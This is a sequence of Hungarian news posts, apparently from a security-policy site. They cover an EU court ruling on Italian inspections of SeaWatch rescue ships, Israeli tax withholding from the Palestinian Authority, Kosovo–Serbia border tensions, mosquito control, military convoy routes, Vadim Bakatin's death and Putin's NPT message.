A luxemburgi székhelyű testület ítéletében kiemelte: a hatóságok azonban csak a biztonságot, a környezetet vagy az emberek egészségét fenyegető egyértelmű kockázat esetén alkalmazhatnak korlátozó intézkedéseket, az ilyen fennállásának bizonyítása pedig az adott állam feladata.

A SeaWatch International német segélyszervezet által üzemeltetett hajók rendszeresen végeznek kutató és mentő tevékenységet a Földközi-tengeren. A hajók német zászló alatt járják a vizeket, és teherhajóként vannak bejegyezve. 2020 nyarán a szervezet olasz kikötőkben tett partra kimentett embereket, de az olasz kikötői hatóságok többször ellenőrizték őket, mert nem rendelkeztek kutatási és mentési engedéllyel, és sokkal több embert vettek fel a fedélzetükre, mint ahányra engedélyük volt. A hatóságok úgy vélték továbbá, hogy a hajók műszaki és üzemeltetési hiányosságai veszélyeztetik a közbiztonságot, ezért szükséges feltartóztatásuk. A SeaWatch keresetet nyújtott be ezen intézkedések ellen a szicíliai regionális közigazgatási bírósághoz, azt állítván, hogy a kikötőhatóságok átlépték jogköreiket. A regionális bíróság az uniós testülethez fordult a menekülteket mentő hajók ellenőrzésére és korlátozására vonatkozó hatáskör megállapítása érdekében.

Az uniós bíróság szerint bizonyos körülmények indokolhatják hajók ellenőrzését és feltartóztatását, “de az a puszta tény, hogy egy hajó a tengeren megmentett embereket szállít, nem nyújt elegendő okot erre”.

“A fedélzeten tartózkodó személyek száma, még ha nagyobb is, mint ami megengedett, önmagában nem képezhet alapot az ellenőrzésre”- szögezte le a luxemburgi testület. Hozzátette azonban, hogy a mentési műveleteket végrehajtó hajók teherhajóként való engedélyezése viszont már elegendő okot adhat a hatóságoknak az ellenőrzéshez.

Most az olasz bíróságon a sor, hogy eldöntse az uniós bíróság útmutatásait felhasználva, hogy az adott ügyben a kikötőhatóságok intézkedései arányosak voltak-e.

 

The post Uniós bíróság: az állam ellenőrizheti a bevándorlókat mentő hajók tevékenységét appeared first on .

Izrael visszatart a palesztinok számára beszedett adóbevételekből 610 millió sékelt (mintegy 70 milliárd forint), amennyivel a Palesztin Hatóság (PH) a terroristák családjait segélyezi – jelentette a ynet.

Az izraeli biztonsági kabinet vasárnapi ülésén döntött a terroristák segélyére szánt összeg levonásából. Ezt a lépést előírja a kormány számára egy 2018-ban elfogadott törvény, amely nem biztosít mérlegelési jogot, a védelmi minisztériumnak át kell adnia a szükséges információkat, vagyis a PH terroristáknak és családtagjaiknak fizetett segélyeinek összegét a biztonsági kabinetnek, és az adóbevételekből évente be kell fagyasztani ezt a pénzt. A teljes összeget 12 részletben, havonta vonják le az izraeli hatóságok. A kabinet ülésén csak a baloldali liberális Merec párt élén álló Nicán Horovic egészségügyi miniszter tartózkodott a szavazástól, a szociáldemokrata Munkapártot vezető Merav Michaeli közlekedési miniszter viszont igennel szavazott.

Horovic rámutatott a PH-gal folytatott biztonsági és polgári együttműködés fontosságára, melyet megnehezít a levonás, noha az elmúlt évek befagyasztott pénzeinek nagy részét kölcsön formájában átadták végül a PH-nak.

Michaeli azt javasolta, hogy kezdjenek politikai párbeszédet a palesztinokkal, mert szerinte van hajlandóság a PH-nál abbahagyni a terroristák és családjaik fizetését, de Naftali Bennett ellenezte ezt a dialógust, mert szerinte nincs miről beszélni: a PH-nak abba kell hagynia a terroristák segélyezését.

A PH alapítványokon keresztül folyósít bevételeiből pénzeket a terrortámadások elkövetéséért izraeli börtönökben lévő palesztinoknak, valamint az izraeliek megtámadása közben megölt palesztinok családjainak. Ezt az alapot a palesztinok “mártíralapnak” nevezik – emlékeztetett a The Jerusalem Post című újság honlapja.

A hosszabb börtönbüntetéssel sújtott palesztinok magasabb havi segélyben részesülnek, így minél súlyosabb bűncselekményt követtek el izraeliek ellen, annál több pénzt fizet nekik a PH.

Az 1993-as Oslói Megállapodások alapján Izrael szedi be az áfát és a vámokat a PH területére irányuló import után, amely izraeli ellenőrzőpontokon megy keresztül. Ez jelenti a PH legnagyobb bevételi forrását, de Izrael emellett jövedelemadót és egészségbiztosítási alapokat is beszed számukra az izraelieknek dolgozó palesztinok után.

 

The post A PH terroristák családjainak fizetett segélyek összegével csökkenti a palesztinok adóbevételeit Izrael appeared first on .

A tőlünk keletre zajló orosz ukrán “testvérháború” árnyékában és annak hatásaival küzdve könnyen elfeledkezhetnénk más, számunkra legalább olyan fontossággal bíró térségekről, amik hazánkhoz még közelebb vannak. Kétségtelenül ilyen régiónak tekinthető a Nyugat- Balkán, ahol vasárnap este zajos incidensek történtek. Még pontosabb behatárolással a koszovói-szerb határon történtekre kell gondolnunk, ahol, bár személyi sérülés nem történt, mégis lövések dördültek el.Persze, akár figyelmen  kívül is hagyhatnánk az eseményeket, mivel ilyen nem először fordul elő az említett térségben, azonban két ok miatt mégis komoly jelentőséégel bírnak számunkra: egyrészt a magyar kormány térségre irányuló külpolitikája egyértelmű, hiszen az a térség európai integrációja irányul, másrészt a térségben állomásozó NATO-erők, azaz a KFOR 2021 októbere óta magyar vezetés alatt állnak, így hazánk katonái is a térségben szolgálnak.

A fenti tényeken túl a Washington Postban tegnap megjelent véleménycikk szerzője párhuzamot von a kelet-ukrajnai eseményekkel,hiszen abban megemlítik azt az orosz  álláspontot, amely szerint a nyugati államok Koszovó függetlenségének(2008) elismerésével maguk szolgáltattak alapot a donbaszi régió önállóságának elismerésére.Bár az orosz érvelés ebben a formában kissé kontraproduktívnak tűnik, és álláspontom szerint inkább erősíti, semmint gyengíti Koszovó euroatlanti integrációs törekvéseit és a belső európai kohéziót, mégis rámutat arra, hogy mennyire törékeny még mindig a térség biztonsága. Megoldásként továbbra is erősíteni kell az említett nemzetek/nemzetiségek közti bizalmat és rendkívül óvatosan kell bármilyen a (bel)politikai népszerűséget erősíteni kívánó  döntés-előkészítés és -hozatal ügyében eljárni.

 

 

A Egyre fokozódik a helyzet délen is? bejegyzés először Biztonságpolitika-én jelent meg.

A héten országszerte 72 településen és 9 budapesti kerületben folytatódik a szúnyoggyérítési program – közölte a program végrehajtásáért felelős Országos Katasztrófavédelmi Főigazgatóság (OKF).

Budapesten a III., IV., XIII., XI., XVI., XVII. XXI., XXII., XXIII. kerületben, illetve a többi között Ercsiben, Érden, Százhalombattán, több Dráva menti és Borsod-Abaúj-Zemplén megyei településen lesz beavatkozás irtják a szakemberek a vérszívókat. A hosszú aszályos időjárás következtében ugyan mérséklődött a szúnyogártalom, ám a hétvégi felhőszakadás kedvezett a szúnyogok megjelenésének – tették hozzá.

Mint írták: a hétvégi esők hatására néhány régióban várhatóan emelkedik a szúnyogártalom mértéke, elsősorban azokon a területeken, ahol tovább megmarad a lehullott esővíz. A katasztrófavédelem által megbízott szakértők folyamatosan nyomon követik a tenyészőhelyek állapotát, ahol szükséges, sor kerül a lárvák, később pedig a kifejlett egyedek elleni védekezésre – ismertették.

Arra is felhívták a figyelmet, hogy az esőzések után a lakosság is sokat tehet a szúnyogártalom csökkentése érdekében, a ház körüli tartályokban, kaspókban felgyűlt víz kiöntésével, vagyis az élőhelyek felszámolásával.

 

The post Katasztrófavédelem: 72 településen és 9 budapesti kerületben lesz szúnyoggyérítés appeared first on .

Katonai csapatmozgások miatt nagyobb honvédségi járműforgalomra kell számítani a napokban az ország több területén – közölte a Honvédelmi Minisztérium (HM).

Közleményeikben azt írták: hétfőtől szerdáig az esti és éjszakai órákban katonai menetoszlopok haladnak a Hajdúhadház – 4-es főút – 354-es út – M35-ös – M3-as – M31-es – M0-s – M1-es – 8119-es út – Tata útvonalon.

A járműoszlopok az M3-as autópálya oszlári Tisza-hídján, valamint az M0-s autóút soroksári Duna-hídján és hárosi Duna-hídján a teljes forgalom kizárása mellett mennek át – tették hozzá.

A tájékoztatás szerint szerdán napközben és kora este is nagyobb katonai járműforgalom várható az MH 12. Arrabona Légvédelmi Rakétaezred technikai eszközeinek manővere miatt a Hajdúhadház – M3-as – M0-s – M1-es – M19-es – Győr útvonalon.

A Magyar Honvédség (MH) arra kérte a lakosságot, hogy a közlekedési szabályok betartásával és kellő óvatossággal közelítsék meg a katonai járműveket, mivel azok mérete és sebessége, valamint a konvojok hossza és haladásának módja eltér a mindennapi közúti közlekedésben megszokottól. Mivel a zárt menetoszlop járművei közé nem hajthat be civil gépjármű, a járművek haladását a konvoj elején és végén kísérőjárművek biztosítják – jelezték.

 

The post HM: nagyobb honvédségi járműforgalom várható az ország több területén appeared first on .

Elhunyt Vagyim Bakatyin, a szovjet Állambiztonsági Bizottság (KGB) utolsó elnöke, 85 éves volt – jelentette a RIA Novosztyi hírügynökség.

Bakatyin a Mihail Gorbacsov szovjet elnök-pártfőtitkár ellen 1991. augusztusában megkísérelt puccs után került a KGB élére. Ebben a minőségében leginkább arról vált ismertté, hogy az államfő jóváhagyásával, Moszkva jószándékának jeleként átadta az Egyesült Államoknak a moszkvai amerikai nagykövetség új épületének eredeti lehallgatási tervét.

Bakatyin 1937. november 6-án született a Novoszibirszk megyei Kiszeljovszkban. Elvégezte a Novoszibirszki Építőmérnöki Egyetemet, az építőiparban dolgozott, majd 1973-ban belépett a Szovjetunió Kommunista Pártjába, ami elindította politikai pályafutását.

A Kirov, később a Kemerovo megyei pártbizottság első titkára volt, majd a párt Központi Bizottságának tagjává választották. 1988-ban belügyminiszterré nevezték ki. 1991-ben versenybe szállt a választáson Oroszországi Szovjet Szocialista Szövetségi Köztársaság elnökségéért, és hat jelölt közül az utolsó helyen végzett.

 

The post Elhunyt a KGB utolsó főnöke appeared first on .

Egy nukleáris háborúnak nem lehetnek győztesei, ilyen összecsapást soha nem szabad kirobbantani – jelentette ki Putyin a nukleáris fegyverek elterjedésének megakadályozásáról szóló szerződés tizedik felülvizsgálati konferenciájának résztvevőihez és vendégeihez intézett üzenetében.

“Abból indulunk ki, hogy egy nukleáris háborúnak nem lehetnek győztesei, ilyet soha nem szabad kirobbantani, és mi a világközösség minden tagja számára egyenlő és oszthatatlan biztonság mellett állunk ki” – hangsúlyozta.

Putyin rámutatott, hogy több mint fél évszázados fennállása alatt az atomsorompó-egyezmény a nemzetközi biztonsági és stratégiai stabilitási rendszer egyik kulcsfontosságú elemévé vált. Az egyezményben az atomfegyverek elterjedésének megakadályozása, a leszerelés és az atomenergia békés célú felhasználása terén előírt kötelezettségek teljes mértékben megfelelnek mind a nukleáris fegyverrel rendelkező, mind az ilyennel nem rendelkező államok érdekeinek – mondta.

Az ukajnai háború kirobbantója reményét fejezte ki, hogy a konferencia megerősíti az atomsorompó-szerződésben részt vevő valamennyi állam készségét arra, hogy szigorúan betartsák kötelezettségvállalásaikat, és “érezhetően hozzájáruljanak a nukleáris fegyverek elterjedésének megakadályozását célzó rendszer megerősítéséhez, valamint a béke, a biztonság és a stabilitás biztosításához a világban.

Az atomsorompó-egyezmény felülvizsgálati konferenciáit ötévente tartják. A tizedik találkozót eredetileg 2020 májusában tartották volna New Yorkban, de a koronavírus-járvány miatt elhalasztották idén augusztusra.

Az 1968-ban aláírt atomsorompó-egyezmény legitimálta Nagy-Britannia, Kína, az akkori Szovjetunió, az Egyesült Államok és Franciaország nukleáris arzenálját. A többi állam a dokumentum aláírásával lemondott arról a jogáról, hogy tömegpusztító fegyvereket állítson elő vagy szerezzen be. A megállapodásnak jelenleg több mint 190 részes állama van. Izrael, India és Pakisztán nem tartozik közéjük, Észak-Korea pedig 2003 januárjában felmondta a szerződést.

(A kérdés az, lehet-e hinni Putyinnak, hiszen Ukrajna lerohanása előtt többször is légből kapott feltételezének nevezte a háború kirobbantását. A -szerk- megj.)

 

The post Putyin: nukleáris háborút nem szabad kirobbantani appeared first on .